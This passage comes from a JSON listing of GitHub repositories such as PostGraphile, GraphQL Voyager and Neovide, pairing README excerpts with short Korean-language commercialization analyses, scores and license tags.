Sponsors](https://img.shields.io/github/sponsors/benjie?color=ff69b4&label=github%20sponsors)](https://github.com/sponsors/benjie)\n[![Discord chat room](https://img.shields.io/discord/489127045289476126.svg)](http://discord.gg/graphile)\n[![Follow](https://img.shields.io/badge/BSky-@Graphile.org-006aff.svg)](https://bsky.app/profile/graphile.org)\n[![Follow](https://img.shields.io/badge/Mastodon-@Graphile.fosstodon.org-6364ff.svg)](https://fosstodon.org/@graphile)\n\nAt Graphile we love GraphQL so much we named ourself for our love of it! This\nrepository houses many of the Graphile packages that relate to GraphQL (or\nrelate to the packages that relate to GraphQL, or relate to those package...);\nthe two headline projects are **Gra*fast*** and **PostGraphile** but there's\nmany other packages, a fair few of which can be used independently - see below\nfor more details.\n\n**[Grafast][grafast]**: A cutting-edge planning and execution engine for\nGraphQL.j","composite_score":0.0261,"license_safety_tag":"safe"},{"name":"wojtekmach/mix_install_examples","github_url":"https://github.com/wojtekmach/mix_install_examples","stars":15,"language":"Elixir","license":"unknown","abandonment_months":1,"description":"# mix_install_examples 분석\n\n## 왜 보물인가\n프로그래머들이 자주 막히는 라이브러리 설치 문제를 실제 예제로 쉽게 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 프로그래밍 교육 플랫폼**: 초보자 대상 실무 강의 커리큘럼에 통합하여 학습 효율 향상\n2. **개발자 커뮤니티 사이트**: 자주 묻는 질문(FAQ)","readme_excerpt":"# MixInstallExamples\n\nA collection of simple Elixir scripts that are using\n[`Mix.install/2`](https://hexdocs.pm/mix/Mix.html#install/2). (Requires Elixir v1.12+)\n\n## Example\n\nLet's run the example [`benchee.exs`](benchee.exs) script of the excellent\n[Benchee](https://github.com/bencheeorg/benchee) benchmarking library.\n\n```\n$ git clone https://github.com/wojtekmach/mix_install_examples.git\n$ cd mix_install_examples\n$ cat benchee.exs\n```\n\n```elixir\nMix.install([\n  {:benchee, \"~> 1.0\"}\n])\n\nlist = Enum.to_list(1..10_000)\nmap_fun = fn i -> [i, i * i] end\n\nBenchee.run(\n  %{\n    \"flat_map\" => fn -> Enum.flat_map(list, map_fun) end,\n    \"map.flatten\" => fn -> list |> Enum.map(map_fun) |> List.flatten() end\n  },\n  time: 10,\n  memory_time: 2\n)\n```\n\n```\n$ elixir benchee.exs\nOperating System: macOS\nCPU Information: Apple M1\nNumber of Available Cores: 8\nAvailable memory: 16 GB\nElixir 1.14.0-dev\nErlang 25.0-rc3\n\nBenchmark suite executing with the following configuration:\nwarmup: 2 s\ntime: 10 s\nmemo","composite_score":0.0259,"license_safety_tag":"unknown"},{"name":"APIs-guru/graphql-voyager","github_url":"https://github.com/APIs-guru/graphql-voyager","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# GraphQL Voyager 사업화 분석\n\n## 왜 보물인가\n복잡한 데이터 연결 구조를 시각적으로 보여주는 도구로, 기술팀과 비기술팀 모두 데이터 흐름을 쉽게 이해할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: API 제공 회사들이 고객에게 자신의 데이터 구조를 대화형으로 설명하는 학습 플랫폼\n2. **내부 업무 도구**: 대","readme_excerpt":"# GraphQL Voyager\n\n![graphql-voyager logo](./docs/cover.png)\n\nRepresent any GraphQL API as an interactive graph. It's time to finally see **the graph** behind GraphQL.\nYou can also explore number of public GraphQL APIs from [our list](https://github.com/APIs-guru/graphql-apis).\n\n> With graphql-voyager you can visually explore your GraphQL API as an interactive graph. This is a great tool when designing or discussing your data model. It includes multiple example GraphQL schemas and also allows you to connect it to your own GraphQL endpoint. What are you waiting for, explore your API!\n\n_[GraphQL Weekly #42](https://graphqlweekly.com/issues/42)_\n\n## [Live Demo](https://apis.guru/graphql-voyager/)\n\n[![voyager demo](./docs/demo-gif.gif)](https://apis.guru/graphql-voyager/)\n\n## Features\n\n- Quick navigation on graph\n- Left panel which provides more detailed information about every type\n- \"Skip Relay\" option that simplifies graph by removing Relay wrapper classes\n- Ability to choose any type t","composite_score":0.0257,"license_safety_tag":"safe"},{"name":"rabobank-cdc/DeTTECT","github_url":"https://github.com/rabobank-cdc/DeTTECT","stars":5,"language":"SCSS","license":"GPL-3.0","abandonment_months":1,"description":"# DeTTECT 프로젝트 분석\n\n## 왜 보물인가\n사이버보안 공격을 감지하고 대응하기 위한 기술을 체계적으로 정리한 오픈소스로, 기업의 보안 수준을 객관적으로 측정할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 보안 진단 플랫폼**\n기업이 월 구독료를 내고 자신들의 보안 상태를 자동으로 진단받고 개선 방안을 추천받는 웹 서비스로 ","readme_excerpt":"<img src=\"https://github.com/rabobank-cdc/DeTTECT/wiki/images/logo_dark.png#gh-dark-mode-only\" alt=\"DeTT&CT\" width=30% height=30%>\n<img src=\"https://github.com/rabobank-cdc/DeTTECT/wiki/images/logo.png#gh-light-mode-only\" alt=\"DeTT&CT\" width=30% height=30%>\n\n#### Detect Tactics, Techniques & Combat Threats\nLatest version: [2.2.0](https://github.com/rabobank-cdc/DeTTECT/wiki/Changelog#version-220)\n\nTo get started with DeTT&CT, check out one of these resources:\n- This [page](https://github.com/rabobank-cdc/DeTTECT/wiki/Getting-started) on the Wiki.\n- This [blog](https://blog.nviso.eu/2022/03/09/dettct-mapping-detection-to-mitre-attck/) written by [Renaud Frère](https://twitter.com/Azotium) from NVISO has a comprehensive and recent description on the capabilities of DeTT&CT.\n- Blog: [mbsecure.nl/blog/2019/5/dettact-mapping-your-blue-team-to-mitre-attack](https://www.mbsecure.nl/blog/2019/5/dettact-mapping-your-blue-team-to-mitre-attack) or\n- Blog: [siriussecurity.nl/blog/2019/5/8/mapping-","composite_score":0.0257,"license_safety_tag":"restricted"},{"name":"graphile/postgraphile","github_url":"https://github.com/graphile/postgraphile","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# PostGraphile 저장소 분석\n\n## 왜 보물인가\n데이터베이스를 자동으로 웹 서비스로 변환해주는 기술로, 복잡한 코딩 없이 빠르게 업무용 애플리케이션을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 스타트업이 저비용으로 고객 관리, 청구 시스템 등을 빠르게 출시\n- **내부 업무 도구**: 대기업의 부서별 데이터","readme_excerpt":"# 🔮 Graphile's Crystal Monorepo\n\n[![GitHub Sponsors](https://img.shields.io/github/sponsors/benjie?color=ff69b4&label=github%20sponsors)](https://github.com/sponsors/benjie)\n[![Discord chat room](https://img.shields.io/discord/489127045289476126.svg)](http://discord.gg/graphile)\n[![Follow](https://img.shields.io/badge/BSky-@Graphile.org-006aff.svg)](https://bsky.app/profile/graphile.org)\n[![Follow](https://img.shields.io/badge/Mastodon-@Graphile.fosstodon.org-6364ff.svg)](https://fosstodon.org/@graphile)\n\nAt Graphile we love GraphQL so much we named ourself for our love of it! This\nrepository houses many of the Graphile packages that relate to GraphQL (or\nrelate to the packages that relate to GraphQL, or relate to those package...);\nthe two headline projects are **Gra*fast*** and **PostGraphile** but there's\nmany other packages, a fair few of which can be used independently - see below\nfor more details.\n\n**[Grafast][grafast]**: A cutting-edge planning and execution engine for\nGraphQL.j","composite_score":0.0256,"license_safety_tag":"safe"},{"name":"RinteRface/shinyMobile","github_url":"https://github.com/RinteRface/shinyMobile","stars":7,"language":"R","license":"unknown","abandonment_months":2,"description":"# shinyMobile 사업화 분석\n\n## 왜 보물인가\n스마트폰에 최적화된 비즈니스 애플리케이션을 쉽게 만들 수 있는 도구로, 모바일 시대에 빠르게 서비스를 출시하려는 기업들의 개발 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업의 현장 직원이 사용하는 주문·배송 관리 모바일 앱 플랫폼\n2. **내부 업무","readme_excerpt":"# shinyMobile <img src=\"man/figures/logo.png\" width=\"200px\" align=\"right\"/>\n\n\n> Develop outstanding {shiny} apps for iOS and Android, as well as beautiful {shiny} gadgets. {shinyMobile} is built on top of the latest [Framework7](https://framework7.io) template.\n\n[![R build status](https://github.com/RinteRface/shinyMobile/workflows/R-CMD-check/badge.svg)](https://github.com/RinteRface/shinyMobile/actions)\n[![lifecycle](https://img.shields.io/badge/lifecycle-maturing-ff69b4.svg)](https://lifecycle.r-lib.org/articles/stages.html)\n[![CRAN status](https://www.r-pkg.org/badges/version/shinyMobile)](https://cran.r-project.org/package=shinyMobile)\n[![Codecov test coverage](https://codecov.io/gh/RinteRface/shinyMobile/branch/master/graph/badge.svg)](https://app.codecov.io/gh/RinteRface/shinyMobile?branch=master)\n\n\n## Installation\n\n```r\n# from CRAN\ninstall.packages(\"shinyMobile\")\n\n# for the latest version\ndevtools::install_github(\"RinteRface/shinyMobile\")\n```\n\n## Demo\n\nA running demo is availab","composite_score":0.0254,"license_safety_tag":"unknown"},{"name":"tuxera/ntfs-3g","github_url":"https://github.com/tuxera/ntfs-3g","stars":5,"language":"C","license":"gpl-2.0","abandonment_months":1,"description":"# NTFS-3G 저장소 분석\n\n## 왜 보물인가\nWindows 파일 시스템을 Mac과 Linux에서도 사용할 수 있게 만드는 기술로, 서로 다른 운영체제 간의 파일 호환성 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 스토리지 서비스에서 Windows 외부 드라이브를 자동으로 인식하고 관리해주는 기능\n2. **내부","readme_excerpt":"\nINTRODUCTION\n============\n\nThe NTFS-3G driver is an open source, freely available read/write NTFS driver \nfor Linux, FreeBSD, macOS, NetBSD, OpenIndiana, QNX and Haiku. It provides \nsafe and fast handling of the Windows XP, Windows Server 2003, Windows 2000, \nWindows Vista, Windows Server 2008, Windows 7, Windows 8, Windows Server 2012,\nWindows Server 2016, Windows 10 and Windows Server 2019 NTFS file systems.\n\nThe purpose of the project is to develop, quality assurance and support a \ntrustable, featureful and high performance solution for hardware platforms \nand operating systems whose users need to reliably interoperate with NTFS. \nBesides this practical goal, the project also aims to explore the limits \nof the hybrid, kernel/user space filesystem driver approach, performance, \nreliability and feature richness per invested effort wise.\n\nBesides the common file system features, NTFS-3G has support for file \nownership and permissions, POSIX ACLs, junction points, extended attributes \n","composite_score":0.0253,"license_safety_tag":"restricted"},{"name":"haoziqaq/varlet","github_url":"https://github.com/haoziqaq/varlet","stars":5,"language":"Vue","license":"MIT","abandonment_months":0,"description":"# varlet 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 입력한 데이터가 올바른지 자동으로 검증해주는 도구로, 개발자들의 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 회원가입 플랫폼**: 사용자 정보(이메일, 비밀번호, 전화번호) 입력 시 자동 검증으로 오류 방지\n- **전자상거래 결제 시스템**: ","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://varletjs.org/#/en-US/index\">\n    <img src=\"https://varletjs.org/logo.svg\" width=\"150\">\n  </a>\n  <h1>VARLET</h1>\n  <p>A Vue3 component library based on Material Design 2 and 3, supporting mobile and desktop.</p>\n  <p>\n    <a href=\"https://varletjs.org/#/en-US/index\">Documentation</a> |\n    <a href=\"https://github.com/varletjs/varlet/blob/dev/README.zh-CN.md\">中文介绍</a>\n  </p>\n  <p>\n    <img src=\"https://img.shields.io/npm/v/@varlet/ui?style=flat-square\" alt=\"version\">\n    <img src=\"https://img.shields.io/github/stars/varletjs/varlet\" alt=\"stars\">\n    <img src=\"https://img.shields.io/badge/vue-v3.2.0%2B-%23407fbc\" alt=\"vue\">\n    <img src=\"https://img.shields.io/npm/l/@varlet/ui.svg\" alt=\"license\">\n    <img src=\"https://img.shields.io/codecov/c/github/varletjs/varlet\" alt=\"coverage\">\n  </p>\n</div>\n\n---\n\n### Intro\n\nVarlet is a `Vue3` component library based on Material Design 2 and 3, supporting mobile and desktop, developed and maintained by `varletjs","composite_score":0.0252,"license_safety_tag":"safe"},{"name":"waydabber/BetterDummy","github_url":"https://github.com/waydabber/BetterDummy","stars":11,"language":"","license":"unknown","abandonment_months":0,"description":"# BetterDummy 프로젝트 분석\n\n## 왜 보물인가\n더 나은 테스트 데이터를 쉽게 만들어주는 도구로, 소프트웨어 개발 과정에서 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 생성 자동화 기능을 탑재한 유료 테스트 플랫폼\n- **내부 업무 도구**: 기업의 개발팀이 빠르게 테스트하기 위한 사내 ","readme_excerpt":"<div align=\"center\">\n<a href=\"https://github.com/waydabber/BetterDisplay/releases\"><img src=\"https://github.com/user-attachments/assets/3a3e7683-1bfc-4ba1-9a91-4a458488899f\" width=\"290\" height=\"290\" alt=\"BetterDisplay\" align=\"center\"/></a>\n\n<h2>BetterDisplay Pro</h2>\n<p>Custom Resolutions, XDR/HDR Extra Brightness, Virtual Screens, Picture in Picture, Soft-Disconnect, Configuration and EDID overrides, DDC Control, Color Mode Selection, Syncing, Layout Protection and More!</p>\n<a href=\"https://github.com/waydabber/BetterDisplay/releases/download/v4.3.3/BetterDisplay-v4.3.3.dmg\"><img src=\"https://user-images.githubusercontent.com/37590873/219133640-8b7a0179-20a7-4e02-8887-fbbd2eaad64b.png\" width=\"180\" alt=\"Download for macOS\"/></a><br/>\n<sub>\n<b>Download the <a href=\"https://github.com/waydabber/BetterDisplay/releases/download/v4.3.3/BetterDisplay-v4.3.3.dmg\">current v4.3.3 release</a> for macOS Tahoe 26, Sequoia, Sonoma, Ventura</b><br>\nPrevious versions: <a href=\"https://github.com/way","composite_score":0.0251,"license_safety_tag":"unknown"},{"name":"microsoft/SandDance","github_url":"https://github.com/microsoft/SandDance","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# SandDance 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 아름답고 직관적인 시각화로 변환해주는 도구로, 데이터를 보는 방식 자체를 혁신할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 판매 현황, 고객 분석, 재무 데이터를 자동으로 예쁜 차트와 그래프로 변환하는 BI(Business Intelligence) 대시","readme_excerpt":"# SandDance\n\nVisually explore, understand, and present your data.\n\n![sanddance-animation](https://user-images.githubusercontent.com/11507384/189461831-9467863e-bff8-47d2-aa03-ab2b74658814.gif)\n\nBy using easy-to-understand views, SandDance helps you find insights about your data, which in turn help you tell stories supported by data, build cases based on evidence, test hypotheses, dig deeper into surface explanations, support decisions for purchases, or relate data into a wider, real world context.\n\nSandDance uses unit visualizations, which apply a one-to-one mapping between rows in your database and marks on the screen.\nSmooth animated transitions between views help you to maintain context as you interact with your data.\n\n> This new version of SandDance has been rebuilt from scratch with the goal of being modular, extensible, and embeddable into your custom applications. We are now on GitHub so that we are open and driven by the community through contributions, feature requests, and di","composite_score":0.025,"license_safety_tag":"safe"},{"name":"medcl/elasticsearch-analysis-pinyin","github_url":"https://github.com/medcl/elasticsearch-analysis-pinyin","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Elasticsearch 한글 발음 검색 플러그인 분석\n\n## 왜 보물인가\n한국어 검색에서 \"서울\"을 \"서우르\"로 입력해도 찾을 수 있게 해주는 기술로, 한국 이커머스·의료·관공서의 검색 품질을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 의약품 정보 검색 플랫폼에서 약품명의 발음 변형 검색 지원\n- **내부 도구**: 대","readme_excerpt":"Pinyin Analysis for Elasticsearch and OpenSearch\n==================================\n\n![](./assets/banner.png)\n\nThis Pinyin Analysis plugin facilitates the conversion between Chinese characters and Pinyin. It supports major versions of Elasticsearch and OpenSearch. Maintained and supported with ❤️ by [INFINI Labs](https://infinilabs.com).\n\nThe plugin comprises an analyzer named `pinyin`, a tokenizer named `pinyin`, and a token filter named `pinyin`.\n\n# Optional Parameters\n\n- `keep_first_letter`: When enabled, retains only the first letter of each Chinese character. For example, `刘德华` becomes `ldh`. Default: true.\n\n- `keep_separate_first_letter`: When enabled, keeps the first letters of each Chinese character separately. For example, `刘德华` becomes `l`,`d`,`h`. Default: false. Note: This may increase query fuzziness due to term frequency.\n\n- `limit_first_letter_length`: Sets the maximum length of the first letter result. Default: 16.\n\n- `keep_full_pinyin`: When enabled, preserves the full","composite_score":0.025,"license_safety_tag":"safe"},{"name":"aspnet-contrib/AspNet.Security.OAuth.Providers","github_url":"https://github.com/aspnet-contrib/AspNet.Security.OAuth.Providers","stars":5,"language":"C#","license":"Apache-2.0","abandonment_months":0,"description":"# AspNet.Security.OAuth.Providers 가치 분석\n\n## 왜 보물인가\n여러 소셜 로그인 서비스(구글, 페이스북, 깃허브 등)를 쉽게 연결할 수 있는 도구로, 웹사이트 개발자들이 반복적으로 작성해야 하는 복잡한 코드를 미리 만들어둔 것입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 신규 회원가입 시 \"구글로 로그인\", \"","readme_excerpt":"\n# AspNet.Security.OAuth.Providers\n\n**AspNet.Security.OAuth.Providers** is a **collection of security middleware** that you can use in your **ASP.NET Core** application to support social authentication providers like **[GitHub](https://github.com/)**, **[Twitter/X](https://twitter.com/)** or **[Dropbox](https://www.dropbox.com/)**. It is directly inspired by **[Jerrie Pelser](https://github.com/jerriep)**'s initiative, **[Owin.Security.Providers](https://github.com/RockstarLabs/OwinOAuthProviders)**.\n\n**The latest official release can be found on [NuGet](https://www.nuget.org/profiles/aspnet-contrib) and the nightly builds on [MyGet](https://www.myget.org/gallery/aspnet-contrib)**.\n\n[![Build status](https://github.com/aspnet-contrib/AspNet.Security.OAuth.Providers/actions/workflows/build.yml/badge.svg?branch=dev&event=push)](https://github.com/aspnet-contrib/AspNet.Security.OAuth.Providers/actions/workflows/build.yml?query=event%3Apush+branch%3Adev)\n\n> [!TIP]\n> While the aspnet-contrib","composite_score":0.0249,"license_safety_tag":"safe"},{"name":"starkfell/100DaysOfIaC","github_url":"https://github.com/starkfell/100DaysOfIaC","stars":6,"language":"PLpgSQL","license":"unknown","abandonment_months":1,"description":"# starkfell/100DaysOfIaC 분석\n\n## 왜 보물인가\n클라우드 인프라를 코드로 관리하는 100일 학습 과정으로, 기업의 IT 비용을 절감하고 운영 효율을 높이는 실무 노하우를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 교육 플랫폼**: 신입 개발자와 IT 담당자용 클라우드 관리 교육 구독 서비스\n2. **내부 업무 도구**:","readme_excerpt":"# 100 Days of IaC in Azure\n\n## Testing \n\nBelow are the articles, with the latest available at the top. Hit the :watch: and :star: buttons on this [GitHub repo](https://github.com/starkfell/100DaysOfIaC/) to keep up with latest updates. Meet the people behind this series on our [whois page](https://github.com/starkfell/100DaysOfIaC/blob/master/whois.md).\n\n| Subject | Article Link  |\n|---------|---------------|\n| Azure Bicep | [Day 106 - Azure Bicep: Up and running in 10 minutes](articles/day.106.bicep.in.10.min.md)|\n| Petri DevOps Day | [YAML Pipelines: Up and running in an hour](articles/petri/yaml.in.one.hour.md)|\n| Petri DevOps Day | [Kubernetes: Up and running in an hour](articles/petri/k8s.in.one.hour.md)|\n| Azure Storage Security | [Day 105 - Azure Storage Security End-to-End](articles/day.105.secure.azure.storage.md)|\n| Key Vault Security | [Day 104 - Azure Key Vault Security and Automation (in plain English)](articles/day.104.secure.azure.key.vault.md)|\n| Inside Azure SQL | [Day","composite_score":0.0249,"license_safety_tag":"unknown"},{"name":"samuelvanderwaal/metaboss","github_url":"https://github.com/samuelvanderwaal/metaboss","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# Metaboss 사업화 분석\n\n## 왜 보물인가\n블록체인 기반 디지털 자산(NFT)을 쉽게 관리하고 수정할 수 있는 도구로, 기술 없는 사용자도 디지털 자산을 제어할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: NFT 제작사나 아티스트를 위한 클라우드 기반 자산 관리 플랫폼\n2. **내부 업무 도구**: 블록체인 기반 자","readme_excerpt":"[![Crate](https://img.shields.io/crates/v/metaboss)](https://crates.io/crates/metaboss)\n[![Downloads](https://img.shields.io/crates/d/metaboss)](https://crates.io/crates/metaboss)\n[![Build Status](https://img.shields.io/github/actions/workflow/status/samuelvanderwaal/metaboss/ci.yml?branch=main)](https://github.com/samuelvanderwaal/metaboss/actions)\n[![License](https://img.shields.io/crates/l/metaboss)](https://github.com/samuelvanderwaal/metaboss/blob/main/LICENSE)\n\n# Metaboss\n\n![metaboss logo](mb_logo.gif?raw=true)\n\n## Overview\n\nA command-line tool for managing Solana NFTs and tokens via the Metaplex standard. Mint, update, transfer, burn, verify, decode, snapshot, and airdrop — for both legacy Token Metadata and Metaplex Core assets.\n\nSee the [docs](https://metaboss.dev) for full usage instructions. Suggestions and PRs welcome!\n\n**Use at your own risk. Always test commands on devnet before running against production NFTs.**\n\n## Installation\n\n### Install Binary\n\nCopy the following to","composite_score":0.0248,"license_safety_tag":"safe"},{"name":"aimeos/aimeos","github_url":"https://github.com/aimeos/aimeos","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Aimeos 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰을 쉽게 만들 수 있는 오픈소스 도구로, 누구나 자신의 전자상거래 사업을 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 상인을 위한 월 구독형 쇼핑몰 빌더 플랫폼 제공\n2. **내부 업무 도구**: 대형 유통사의 B2B 주문 관리 시스템 구축\n3. **","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://aimeos.org/\">\n        <img src=\"https://aimeos.org/fileadmin/template/icons/logo.png\" alt=\"Aimeos logo\" title=\"Aimeos\" align=\"center\" />\n    </a>\n<p>\n\n<p align=\"center\">\n    <a href=\"https://packagist.org/packages/aimeos/aimeos\" alt=\"Total Downloads\"><img src=\"https://poser.pugx.org/aimeos/aimeos-laravel/d/total.svg\" alt=\"Total Downloads\" title=\"Total Downloads\" /></a>\n    <a href=\"https://packagist.org/packages/aimeos/aimeos\" alt=\"Latest Stable Version\"><img src=\"https://poser.pugx.org/aimeos/aimeos/v/stable.svg\" alt=\"Latest Stable Version\" title=\"Latest Stable Version\" /></a>\n    <a href=\"https://packagist.org/packages/aimeos/aimeos\" alt=\"License\"><img src=\"https://img.shields.io/github/license/aimeos/aimeos\" alt=\"License\" title=\"License\" /></a>\n    <a href=\"https://github.com/aimeos/aimeos/issues\" alt=\"Open issues\"><img src=\"https://img.shields.io/github/issues/aimeos/aimeos?color=brightgreen\" alt=\"Open issues\" title=\"Open issues\" /></a>\n</p>\n","composite_score":0.0248,"license_safety_tag":"safe"},{"name":"joxeankoret/idamagicstrings","github_url":"https://github.com/joxeankoret/idamagicstrings","stars":15,"language":"Python","license":"AGPL-3.0","abandonment_months":2,"description":"# idamagicstrings 상용화 분석\n\n## 왜 보물인가\nIDA Pro(보안 전문가용 복잡한 분석 도구)에서 숨겨진 문자열을 자동으로 찾아내는 기능이라, 악성 소프트웨어 분석 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 악성코드 자동 분석 플랫폼 - 파일 업로드하면 위험한 특징을 자동","readme_excerpt":"# IDA Magic Strings\n\nAn __[IDA](https://www.hex-rays.com) Python plugin__ to extract information from string constants. The current version of the plugin is able to:\n\n * Display functions to source files relationships (in a tree and in a plain list, a chooser in IDA language).\n * Display guessed function names for functions.\n * Rename functions according to the source code file their belong + address (for example, memory_mgmt_0x401050).\n * Rename functions according to the guessed function name.\n\n## Running the plugin\n\nWhen the Python script is executed from within IDA it builds a list of ASCII and Unicode strings found by IDA and then applies a series of regular expressions to extract source code filenames, directories and candidate function names. Then, it shows 3 tabs with information:\n\n * Candidate function names: The function names guessed from the referenced string constants. Some basic and rudimentary false positive detection is implemented and this data is available in the colu","composite_score":0.0248,"license_safety_tag":"risky"},{"name":"James-Yu/LaTeX-Workshop","github_url":"https://github.com/James-Yu/LaTeX-Workshop","stars":8,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# LaTeX-Workshop 보물 분석\n\n## 왜 보물인가\n논문, 책, 학위논문 작성할 때 필요한 전문 문서 편집 도구를 간편하게 만들어주는 확장 프로그램입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 논문 작성 플랫폼으로 학생과 연구자에게 월 구독 제공\n2. **내부 업무 도구**: 대학교 행정팀이 학위논문 양식 자동 생","readme_excerpt":"# Visual Studio Code LaTeX Workshop Extension\n\n<!-- [![version](https://img.shields.io/visual-studio-marketplace/v/James-Yu.latex-workshop)](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop)\n[![updated](https://img.shields.io/visual-studio-marketplace/last-updated/James-Yu.latex-workshop)](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop)\n[![release](https://img.shields.io/visual-studio-marketplace/release-date/James-Yu.latex-workshop)](https://vsmarketplacebadge.apphb.com/downloads-short/James-Yu.latex-workshop.svg)\n\n[![downloads](https://img.shields.io/visual-studio-marketplace/d/James-Yu.latex-workshop)](https://vsmarketplacebadge.apphb.com/downloads-short/James-Yu.latex-workshop.svg)\n[![installs](https://img.shields.io/visual-studio-marketplace/i/James-Yu.latex-workshop)](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop)\n[![rating](https://img.shields.io/visual-studio-marketplace/r/James-Yu.latex-works","composite_score":0.0248,"license_safety_tag":"safe"},{"name":"Kethku/neovide","github_url":"https://github.com/Kethku/neovide","stars":13,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# Neovide 저장소 분석\n\n## 왜 보물인가\n복잡한 텍스트 편집기를 아름다운 사용자 인터페이스로 쉽게 사용할 수 있게 만든 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 코딩 환경을 제공하는 웹 서비스로 개발자들에게 구독 모델로 판매\n2. **내부 업무 도구**: 소프트웨어 회사의 개발팀이 자신들의 개발 환경으","readme_excerpt":"# Neovide\n\n[![Discord](https://img.shields.io/discord/896132176091955261?style=flat&logo=discord)](https://discord.gg/SjFpZdQys6) [![Chat on Matrix](https://matrix.to/img/matrix-badge.svg)](https://matrix.to/#/#neovide:matrix.org) [![Discussions](https://img.shields.io/badge/GitHub-Discussions-green?logo=github)](https://github.com/neovide/neovide/discussions)\n\n<img align=\"left\" src=\"website/docs/assets/neovide-128x128.png\">\n\nThis is a simple graphical user interface for [Neovim](https://github.com/neovim/neovim) (an\naggressively refactored and updated Vim editor). Where possible there are some graphical\nimprovements, but functionally it should act like the terminal UI.\n\nTo checkout all the **cool features**, **installation instructions**, **configuration settings** and\nmuch more, head on over to [neovide.dev](https://neovide.dev).\n\n<br>\n\n<div align=\"center\">\n    <img src=\"website/docs/assets/BasicScreenCap.png\" alt=\"Screenshot of Neovide\">\n    <em>Screenshot of Neovide running on Wind","composite_score":0.0248,"license_safety_tag":"safe"},{"name":"jarun/Buku","github_url":"https://github.com/jarun/Buku","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":1,"description":"# Buku 저장소 분석\n\n## 왜 보물인가\n북마크와 웹 페이지를 간단하게 저장하고 검색할 수 있는 개인용 북마크 관리 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 온라인 북마크 관리 플랫폼으로 개인과 팀이 중요한 웹사이트를 공유하고 정리\n2. **내부 업무 도구**: 회사의 자주 쓰는 사이트와 자료들을 팀원이 함께 저장","readme_excerpt":"<h1 align=\"center\">buku</h1>\n\n<p align=\"center\">\n<a href=\"https://github.com/jarun/buku/releases/latest\"><img src=\"https://img.shields.io/github/release/jarun/buku.svg?maxAge=600\" alt=\"Latest release\" /></a>\n<a href=\"https://repology.org/project/buku/versions\"><img src=\"https://repology.org/badge/tiny-repos/buku.svg?header=repos\" alt=\"Availability\"></a>\n<a href=\"https://pypi.org/project/buku/\"><img src=\"https://img.shields.io/pypi/v/buku.svg?maxAge=600\" alt=\"PyPI\" /></a>\n<a href=\"https://circleci.com/gh/jarun/workflows/buku\"><img src=\"https://img.shields.io/circleci/project/github/jarun/buku.svg\" alt=\"Build Status\" /></a>\n<a href=\"https://buku.readthedocs.io/en/latest/?badge=latest\"><img src=\"https://readthedocs.org/projects/buku/badge/?version=latest\" alt=\"Docs Status\" /></a>\n<a href=\"https://en.wikipedia.org/wiki/Privacy-invasive_software\"><img src=\"https://img.shields.io/badge/privacy-✓-crimson\" alt=\"Privacy Awareness\" /></a>\n<a href=\"https://github.com/jarun/buku/blob/master/LICENS","composite_score":0.0246,"license_safety_tag":"restricted"},{"name":"primo-af/primo","github_url":"https://github.com/primo-af/primo","stars":8,"language":"Svelte","license":"MIT","abandonment_months":0,"description":"# primo-af/primo 분석 보고서\n\n## 왜 보물인가\n사용자 인터페이스 작업을 자동화하고 단순화하는 도구로, 비개발자도 복잡한 웹 화면을 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 업무 관리 솔루션을 빠르게 개발하고 판매하는 플랫폼\n- **내부 업무 도구**: 회사 직원이 스프레드시트 대신 사","readme_excerpt":"# Primo [![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT) [![Svelte](https://img.shields.io/badge/Svelte-5-FF3E00?logo=svelte&logoColor=white)](https://svelte.dev) ![](https://img.shields.io/badge/PocketBase-555555?logo=pocketbase&logoColor=white)\n\nPrimo is a CMS for developers who build sites for clients who need to manage them afterward. Your entire site stays in sync as both a database and a folder of files, so Claude Code, Cursor, and any AI agent can edit it directly. Your clients manage content visually in the browser.\n\n*In active development since 2019. Self-hosted by freelancers, agencies, and small 